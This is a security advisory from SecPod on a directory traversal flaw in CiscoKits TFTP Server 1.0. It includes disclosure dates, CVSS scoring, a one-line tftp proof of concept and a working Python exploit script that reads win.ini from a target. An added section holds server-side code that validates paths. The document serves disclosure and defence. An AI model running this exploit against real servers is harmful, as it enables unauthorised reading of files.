###############################################################################
CiscoKits TFTP Server Directory Traversal Vulnerability

SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################

SecPod ID: 1022
21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
Vendor Replied to Disclose
04/08/2011 Advisory Released

Class: Information Disclosure
Severity: Medium

Overview:
---------
CiscoKits TFTP Server Version 1.0 is prone to a Directory Traversal
vulnerability.

Technical Description:
----------------------
The vulnerability is caused by improper validation of Read Requests
containing '../' sequences, which allows attackers to read arbitrary files
via directory traversal attacks.

Impact:
--------
Successful exploitation could allow an attacker to obtain sensitive
information, which may lead to launching further attacks.

Affected Software:
------------------
CiscoKits TFTP Server Version 1.0

Tested on:
-----------
CiscoKits TFTP Server Version 1.0 on Windows XP SP3.

References:
-----------
http://secpod.org/blog/?p=301
http://www.certificationkits.com
http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt

Proof of Concept:
----------------
tftp> get ../../../../../../../../../../../windows/win.ini

Solution:
----------
Not available

Risk Factor:
-------------
CVSS Score Report:
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = LOW
    AUTHENTICATION         = NOT_REQUIRED
    CONFIDENTIALITY_IMPACT = PARTIAL
    INTEGRITY_IMPACT       = NONE
    AVAILABILITY_IMPACT    = NONE
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
    CVSS Temporal Score    = 4.5
    Risk factor            = Medium

Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of
this vulnerability.
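The validation that the Technical Description reports as missing can be shown from the server side. The following Python code is an added example, not code from the advisory, SecPod or the CiscoKits server: it parses a TFTP Read Request and accepts the filename only if it stays inside the served directory. The function names, the RequestRejected class and the /srv/tftp root are assumptions made for illustration.

```python
import os
import posixpath

class RequestRejected(Exception):
    """Malformed RRQ, or a filename that leaves the TFTP root."""

def parse_rrq(packet: bytes):
    """Split a TFTP read request (RFC 1350) into (filename, mode)."""
    if len(packet) < 4 or packet[:2] != b"\x00\x01":
        raise RequestRejected("not a read request")
    fields = packet[2:].split(b"\x00")
    # Well-formed: filename NUL mode NUL, so the split ends in b"".
    if len(fields) < 3 or not fields[0] or fields[-1] != b"":
        raise RequestRejected("malformed request")
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise RequestRejected("non-ASCII field")

def safe_relative_path(filename: str) -> str:
    """Normalize the requested name; reject anything that climbs out."""
    # Windows accepts both separators, so fold "\" into "/" first.
    name = filename.replace("\\", "/")
    if name.startswith("/") or ":" in name:
        raise RequestRejected("absolute path or drive letter")
    norm = posixpath.normpath(name)
    if norm in (".", "..") or norm.startswith("../"):
        raise RequestRejected("path escapes the TFTP root")
    return norm

def resolve_under_root(root: str, rel: str) -> str:
    """Join onto the root; confirm the real path (links resolved) is inside."""
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, *rel.split("/")))
    if os.path.commonpath([root_real, full]) != root_real:
        raise RequestRejected("resolved path is outside the TFTP root")
    return full

def check(packet: bytes, root: str) -> str:
    filename, _mode = parse_rrq(packet)
    return resolve_under_root(root, safe_relative_path(filename))

# Constructed sample request; "/srv/tftp" is an assumed root directory.
SAMPLE = b"\x00\x01" + b"../" * 10 + b"windows/win.ini\x00netascii\x00"

if __name__ == "__main__":
    try:
        print("serve:", check(SAMPLE, "/srv/tftp"))
    except RequestRejected as why:
        print("reject:", why)
```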
====================================================
#!/usr/bin/python
##############################################################################
# Title    : CiscoKits TFTP Server Directory Traversal Vulnerability
# Author   : Antu Sanadi from SecPod Technologies (www.secpod.com)
# Vendor   : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory : http://secpod.org/blog/?p=301
#            http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
#            http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt
# Version  : CiscoKits CCNA TFTP Server 1.0.0.0
# Date     : 21/07/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "windows/win.ini" + "\x00"  ## Read win.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    # netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()